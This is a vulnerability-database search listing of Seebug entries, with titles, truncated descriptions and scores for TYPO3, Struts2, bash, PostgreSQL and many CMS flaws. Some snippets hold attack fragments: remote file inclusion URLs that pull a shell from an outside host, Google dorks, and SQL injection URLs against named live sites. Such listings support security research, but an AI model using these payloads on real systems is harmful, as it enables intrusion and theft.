Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2014/07/01 12:0 a.m.130 views

TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit

No description provided by source. !/usr/bin/env python ------------------------------------------------------------------------------ TYPO3-SA-2009-002 exploit by Lolek of TK53 lolek1337 at gmail.com date: 2009/02/10 vendor url: http://typo3.org vulnerable versions: TYPO3 4.2.6, TYPO3 4.1.10,...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/02/25 12:0 a.m.130 views

PostgreSQL远程栈缓冲区溢出漏洞

BUGTRAQ ID: 65719 CVECAN ID: CVE-2014-0063 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL 9.3.3, 9.2.7, 9.1.12, 9.0.16, 8.4.20之前版本的常数MAXDATELEN对于类型interval的最长值过小,这可使intervalout缓冲区溢出。为避免缓冲区溢出,日期时间函数会拒绝包含了较长时间域名称的有效输入。ecpg库内包含了这些漏洞。经过身份验证的数据库用户可利用此漏洞造成PostgreSQL服务器崩溃或执行任意代码。 0 PostgreSQL...

6.5CVSS0.06666EPSS
Exploits2
seebug.org
seebug.org
added 2018/06/13 12:0 a.m.129 views

NUCMS 前台SQL注入漏洞

...

1.1AI score
Exploits0
seebug.org
seebug.org
added 2017/03/11 12:0 a.m.129 views

ohocms getsyscat.php sql注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/29 12:0 a.m.129 views

WQCMS 6.0 /admin_wqSwfUpload.aspx 文件上传漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.129 views

UtilMind Mail List 1.7 - Users Can Execute Commands

No description provided by source. !/usr/bin/perl -w Mailing List & News Version 1.7 / PoC Exploit. UtilMind Solutions / http://www.utilmind.com/ Actually a pretty amusing exploit to write! The 'openMAIL, |$mailprog $address' ... code sends e-mail to those who are on the mailing list - and the...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/01/03 12:0 a.m.129 views

汇文图书馆管理系统致使数十所高校学生信息可泄露

简要描述: 目前汇文软件图书管理系统由于丰富的功能和优良的用户体验被越来越多的高校图书馆采用,但是经测试发现了一个设计疏忽的漏洞而导致高校师生的信息泄露。 详细说明: 猜测是由于高校方面出于方便的考虑,图书馆个人管理系统用户名与密码均初始化为学号,这就给别人留下了可乘之机:因为师生很少会主动的去更改图书馆管理系统的密码,由于学号的连续性,因此只要找到了学校的学号构建规则(或者直接去谷歌一个对应学校的学号)就可以推而广之获取全校师生的图书馆管理系统的用户名密码(均为学号),使用脚本就可以批量化的进行畅通无阻的登录并获取众多师生的信息(安全意识高,自觉修改密码的除外)。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/01/16 12:0 a.m.129 views

XAMPP WebDAV PHP Upload

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/11/10 12:0 a.m.129 views

Apache Tomcat Windows安装程序默认空口令漏洞

BUGTRAQ ID: 36954 CVE ID: CVE-2009-3548 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Windows安装程序默认对管理用户设置了空口令。如果在安装过程中没有更改这个口令,就会使用空口令创建各种管理用户。 Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 厂商补丁: Apache Group ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.5CVSS7.3AI score0.78995EPSS
Exploits10
seebug.org
seebug.org
added 2007/06/04 12:0 a.m.129 views

screen 4.0.3 Local Authentication Bypass Vulnerability

No description provided by source. / / / / / / / / / / / / / // / / / / / / / / / // / / / // // / / / / / // ///// // // // Helith - 0815 -------------------------------------------------------------------------------- Author: Rembrandt Date: Known since somewhere in &cantremember...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/05 12:0 a.m.129 views

Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability

No description provided by source. Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/07/06 12:0 a.m.128 views

KGUARD DVR 未授权命令执行漏洞

...

1.2AI score
Exploits0
seebug.org
seebug.org
added 2021/05/13 12:0 a.m.129 views

Microsoft Azure Virtual Machine信息泄露漏洞(CVE-2021-27075)

CVE-2021-27075: Microsoft Azure Vulnerability Allows Privilege Escalation and Leak of Private Data Written by Paul Litvak - 11 May 2021 In this post I will explain how the Microsoft Azure Virtual Machine VM extension works and how we found a fatal vulnerability in the extension mechanism affectin...

2.7CVSS0.1AI score0.01343EPSS
Exploits1
seebug.org
seebug.org
added 2016/07/01 12:0 a.m.128 views

帝国CMS手机插件/ikaimi/rolling/list.php sql injection vulnerability

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/09/29 12:0 a.m.128 views

GNU bash Environment Variable Command Injection (MSF)

No description provided by source. require 'msf/core' class Metasploit3 Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initializeinfo = superupdateinfoinfo, 'Name' = 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts tha...

10CVSS9.7AI score0.99999EPSS
Exploits131
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.128 views

OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/5363/info A buffer-overflow vulnerability has been reported in some versions of OpenSSL. The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be abl...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.128 views

Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability

No description provided by source. Title: Advanced GuestBook for phpBB = 2.4.0 Remote File Inclusion Dork: inurl:guestbook.php Advanced GuestBook powered by phpbb Credits: Oo Exploit: http://url/phpbbpath/admin/addentry.php?phpbbrootpath=http://badscript? milw0rm.com 2006-04-28...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.128 views

Coppermine Photo Gallery <= 1.3.2 File Retrieval SQL Injection Exploit

No description provided by source. tested and approved /str0ke CPG Exploit File Retrieval by SQL Injection. By Default this exploit get the config.inc.php file which contains the db user/pass If you want to get another file you need to have the good cookie you can use this phpscript to get good...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/03/26 12:0 a.m.128 views

Jorjweb &quot;id&quot; SQL注入漏洞

Jorjweb是一款基于WEB的应用。 Jorjweb ajedrez47/Paginas/infotorneo.php不正确过滤用户提交给"id"参数的数据,允许远程攻击者利用漏洞提交特殊的SQL查询,可操作或获取数据库数据。 0 Jorjweb 目前没有详细解决方案提供: http://www.jorjweb.com/ PoC: http://jorjweb.localhost:8080/ajedrez47/Paginas/infotorneo.php?id=REMOTE SQL-INJECTION WEB VULNERABILITY!-- Demo Urls:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/01/02 12:0 a.m.128 views

Lighttpd Proof of Concept code for CVE-2011-4362

No description provided by source. 29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that modauth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: "src/httpauth.c:67...

5CVSS9.6AI score0.16246EPSS
Exploits8
seebug.org
seebug.org
added 2007/04/20 12:0 a.m.128 views

IBM Tivoli Monitoring Express通用代理多个堆溢出漏洞

IBM Tivoli Monitoring Express用于帮助用户监控和管理操作系统、数据库及应用。 Tivoli Monitoring Express的Tivoli Universal Agent Primary Service(TCP 10110)、Monitoring Agent for Windows OS - Primary(TCP 6014)和Tivoli Enterprise Portal Server(TCP 14206)服务中存在堆溢出漏洞,如果向这些服务发送了超长字符串的话,就会在调用kde.dll中有漏洞函数期间触发堆溢出,导致执行任意指令。 IBM Tivol...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2021/06/07 12:0 a.m.127 views

CHIYU IoT services Authentication bypass in telnet server(CVE-2021-31251)

...

7.5CVSS3.2AI score0.35714EPSS
Exploits5
seebug.org
seebug.org
added 2018/06/08 12:0 a.m.127 views

Microsoft Edge: Chakra: Cross context bug(CVE-2018-0946)

Background The CrossSite class is used for passing JavaScript variables across different contexts. Chakra is basically trying to wrap every variable being passed from a context to another context. The way it wraps an object is, first overwrite the virtual function table pointer of the given objec...

7.6CVSS7.9AI score0.51857EPSS
Exploits1
seebug.org
seebug.org
added 2018/01/31 12:0 a.m.127 views

Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability

Summary A vulnerability in the Secure Sockets Layer SSL VPN functionality of the Cisco Adaptive Security Appliance ASA Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. The vulnerability is due to an attempt to double fr...

9.8AI score0.87397EPSS
Exploits7
seebug.org
seebug.org
added 2016/03/24 12:0 a.m.127 views

akcms 6.1版本 存在sql注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/04/08 12:0 a.m.127 views

上海安脉教育管理系统存在注入漏洞

简要描述: RT 详细说明: SQL注入文件 /anmai/KYMamage/IntegrateSelect/PatentProductionparticular.aspx SQL注入案例: http://218.78.241.80/anmai/KYMamage/IntegrateSelect/PatentProductionparticular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KYMamage/IntegrateSelect/PatentProductionparticular.aspx?id=1...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.127 views

HydraIrc <= 0.3.164 (last) Remote Denial of Service Exploit

No description provided by source. Vendor : http://www.hydrairc.com/ Remote : Yes Impact : Remote crash Bug : Null Pointer Dereference Working on : all browsers Include this in any webpage or xss & see it with any browser , wait 15sec, and boom. PoC : html head titleHydraIRC Remote Denial Of...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.127 views

Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl ------------------------------------------------------------- Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit. Exploit coded by mr.pr0n http://s3cure.gr . Many greetz to krumel for his help :-...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.127 views

myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)

No description provided by source. !/usr/bin/perl Title: myMP3-Player v3.0 .m3u Local Buffer Overflow Exploit SEH Date: 18.03.2010 Author: n3w7u Software Link: http://www.chip.de/downloads/myMP3-Player-3.013008621.html Version: 3.0 and the other version can't be download from serious Page, and...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.127 views

Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit

No description provided by source. / half-nelson.c Linux Kernel 2.6.36.2 Econet Privilege Escalation Exploit Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848 Stack-based buffer overflow in the econetsendmsg function ...

6.9CVSS0.01542EPSS
Exploits13
seebug.org
seebug.org
added 2014/04/21 12:0 a.m.127 views

McAfee Endpoint Intelligence Agent OpenSSL TLS心跳信息泄漏漏洞

CVE ID:CVE-2014-0160 McAfee Endpoint Intelligence Agent是一款McAfee产品中所使用的一个网络服务。 McAfee Endpoint Intelligence Agent所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 McAfee Endpoint Intelligence Agent 1.x Formerly Network Integrity Agent McAfee Endpoin...

5CVSS0.2AI score0.99999EPSS
Exploits87
seebug.org
seebug.org
added 2013/08/02 12:0 a.m.127 views

金蝶EAS v7.5远程命令执行

简要描述: 金蝶 远程命令执行 详细说明: 金蝶EAS v7.5 全国使用的单位应该不少吧,而且涉及的内容应该是公司内核心机密吧。这个版本应该是最新的吧,应该是。。。吧。 到服务器上查看struts2 发现为很老版本了2.1.8.1(我会告诉你服务器是捅下来的么)。 该产品大部分链接需要登录才能访问,在没有帐号时相关权限只可远观而不可亵玩。 but http://localhost/pltiservice/service/findFavList.action 等几个action为接口,无须登录便可以访问。 没有帐号也可以执行漏洞代码。 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/11/11 12:0 a.m.127 views

phpcms 2008 product.php pagesize参数代码注射漏洞

PHPCMS是国内领先的网站管理系统,同时也是一个开源的PHP开发框架。 PHPCMS 2008在处理某些模板参数时存在安全漏洞,其yp/product.php页面的pagesize参数没有正确进行检查过滤,导致可以提交任意字符,远程攻击者可利用此漏洞执行任意命令 具体的代码触发路径是这样的: phpcms/yp/product.php中获取pagesize参数,拼接为$urlrule变量。随后将之带入yp目录下的product.html模板之中。在模板执行后,进入到get函数处理中,最后经过get-pages-pageurl函数,最终触发pageurl的如下代码: eval"$url ...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/06/05 12:0 a.m.127 views

Linux Kernel e1000驱动拒绝服务漏洞

BUGTRAQ ID: 35185 CVECAN ID: CVE-2009-1385 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel e1000驱动中drivers/net/e1000/e1000main.c文件的e1000cleanrxirq函数没有正确地验证畸形网络报文,远程攻击者可以在发送的报文中设置特制的接口MTU帧大小导致内核忙碌。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.8CVSS0.2AI score0.33491EPSS
Exploits2
seebug.org
seebug.org
added 2007/09/24 12:0 a.m.127 views

DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities

No description provided by source. DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities Vulnerability Type: Remote File Inclusion Vulnerable file: /dfdcart/app.lib/product.control/core.php/product.control.config.php Exploit URL:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/02/14 12:0 a.m.127 views

Kiwi CatTools TFTP目录遍历漏洞

Kiwi CatTools是一个管理网络设备如路由器、交换机与防火墙的工具。 CatTools TFTP服务器处理请求时存在输入验证漏洞,远程攻击者可能利用此漏洞遍历服务器目录访问任意文件。 CatTools TFTP服务器没有正确检查请求文件路径中的目录遍历串,允许远程攻击者通过特制的目录遍历序列向TFTP根目录以外的任意位置上传或下载任意文件。 Kiwi CatTools 3.2.0 beta 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.kiwisyslog.com/cattools-info.php tftp -i 10.11.12.1...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/02/19 12:0 a.m.126 views

phpwind命令执行getshell(后台)

简要描述: 官网下载最新版 详细说明: v9.0.1 搭建好,登陆 在门户里选择页面管理,新增模块。自定义html 写入phpinfo,提交,然后调用代码 选择调用站外代,复制连接,访问 调用xml,json都可以。以xml为例, http://127.0.0.1/phpwind/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml 去掉xml,会执行phpinfo img src="https://images...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/02/08 12:0 a.m.126 views

汇文软件某系统默认配置不当(小问题可引发大问题,威胁诸多用户)

简要描述: 默认配置不当 详细说明: 汇文软件 汇文应用服务系统Java版 默认配置不当,提供的下载软件包内的某文件中存储了通用的用户名密码(可直接登录),可以使用此账号密码进行钓鱼等操作,威胁诸多用户 漏洞证明: 下载得到软件包,解压得到配置文件 打开配置文件,账号密码全泄漏,可直接登录 登陆成功 可能存在的威胁猜想: 1:由于此软件包提供公开下载,使用者服务器上的配置也使用了此配置文件,一旦此账号密码被修改,可导致使用者平台用户的密码找回等功能无法使用。 2:此账号中包含了一些使用用户的少量信息,可使用此账号向用户邮箱推送钓鱼信息导致用户被钓鱼。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/12/23 12:0 a.m.126 views

致远A8-V5协同管理软件普通用户任意文件上传(通杀V5)

简要描述: 这几天一直在琢磨致远A8-V5,昨天发现几个小问题,今天进一步挖掘到任意文件上传漏洞。 详细说明: 致远A8-V5协同管理软件允许普通用户调用本属于system·权限的功能【登陆页模板管理】,虽然不能利用浏览器直接访问该功能,提示权限不足,但是直接发送数据包即可成功。 致远A8-V5协同管理软件充分的考虑了上传文件所带来的危险,全系统都采用上传文件缓存到web目录以外,不能直接获取webshell。但利用【登陆页模板管理】处的文件缓存迁移到web目录功能即可获取webshell。 漏洞证明: 演示地址: http://a8v51.seeyon.com/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/17 12:0 a.m.126 views

yongyouNC /hrss/ELTextFile.load.d 信息泄漏漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.126 views

Acoustica MP3 Audio Mixer 2.471 - (.m3u) Local Heap Overflow PoC

No description provided by source. !/usr/perl/bin -w Foundr By : D3V!L FucK3r MY Email: [email protected] Download : http://www.acoustica.com Tested on : Windos vista sp1 Version : mp3 audio mixer v.2.471 Demo if you Click ×××××× and select file then ...... : perl For a men : Gretz to : Sa^Devl ,...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.126 views

PHP openssl_x509_parse() - Memory Corruption Vulnerability

No description provided by source. SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: PHP opensslx509parse Memory Corruption Vulnerability Release Date: 2013/12/13 Last Modified: 2013/12/13 Author: Stefan Esser stefan.esseratsektioneins.de Application: PHP 4.0.6 - PHP 4.4.9 PHP...

7.5CVSS0.4AI score0.35635EPSS
Exploits8
seebug.org
seebug.org
added 2013/07/17 12:0 a.m.126 views

Apache Struts2 多个前缀参数远程命令执行漏洞(CVE-2013-2251)

CVE-2013-2251 Struts2 是第二代基于Model-View-Controller MVC模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物 Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令 redirect:和redirectAction:此两项前缀为Struts默认开启功能,目前Struts...

9.3CVSS1AI score0.99998EPSS
Exploits18
seebug.org
seebug.org
added 2011/07/07 12:0 a.m.126 views

VSFTPD v2.3.4 Backdoor Command Execution

No description provided by source. $Id: vsftpd234backdoor.rb 13099 2011-07-05 05:20:47Z hdm $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/02/20 12:0 a.m.126 views

PHP session.save_path()函数任意命令执行漏洞

BUGTRAQ ID: 37390 CVE ID: CVE-2009-4143 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP在处理会话信息的功能函数实现上存在漏洞,远程攻击者可能利用此漏洞以PHP进程的权限执行任意命令,导致权限提升。 PHP = 5.2.11 PHP 5.2.0 厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.php.net...

10CVSS9.4AI score0.02946EPSS
Exploits1
seebug.org
seebug.org
added 2008/01/25 12:0 a.m.126 views

PHP cURL 'safe mode'安全绕过漏洞

BUGTRAQ ID: 27413 CVE ID:CVE-2007-4850 CNCVE ID:CNCVE-20074850 PHP是一款流行的网络编程语言。 PHP cURL存在'safe mode'安全绕过问题,远程攻击者可以利用漏洞访问受限制文件,获得敏感信息。 vardumpcurlexeccurlinit"file://safemodebypass\x00&qu ot;.FILE; is caused by error in curl/interface.c - --- define PHPCURLCHECKOPENBASEDIRstr, len, ret if...

5CVSS9.6AI score0.05575EPSS
Exploits2
seebug.org
seebug.org
added 2002/01/18 12:0 a.m.126 views

Solaris in.telnetd TTYPROMPT Buffer Overflow

漏洞描述:Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。 Solaris 10的TELNET服务在处理畸形的认证数据时存在漏洞,远程攻击者可能利用此漏洞绕过认证获得访问。 Solaris...

10CVSS6.3AI score0.97848EPSS
Exploits39
seebug.org
seebug.org
added 2021/04/09 12:0 a.m.125 views

齐治堡垒机任意用户登录漏洞

...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2018/02/24 12:0 a.m.125 views

Windows: StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation EoP(CVE-2018-0826)

Windows: StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation EoP Platform: Windows 10 1709 not tested earlier versions Class: Elevation of Privilege Summary: The SvcMoveFileInheritSecurity RPC method in StorSvc can be used to move an arbitrary file to an arbitrary location resulting in...

6.9CVSS7.7AI score0.03165EPSS
Exploits5
seebug.org
seebug.org
added 2017/10/24 12:0 a.m.125 views

Linux Kernel AF_PACKET Use-After-Free(CVE-2017-15649)

Vulnerabilities summary The following advisory describes a use-after-free vulnerability found in Linux Kernel’s implementation of AFPACKET that can lead to privilege escalation. AFPACKET sockets “allow users to send or receive packets on the device driver level. This for example lets them to...

4.6CVSS8.1AI score0.0097EPSS
Exploits4
Total number of security vulnerabilities5000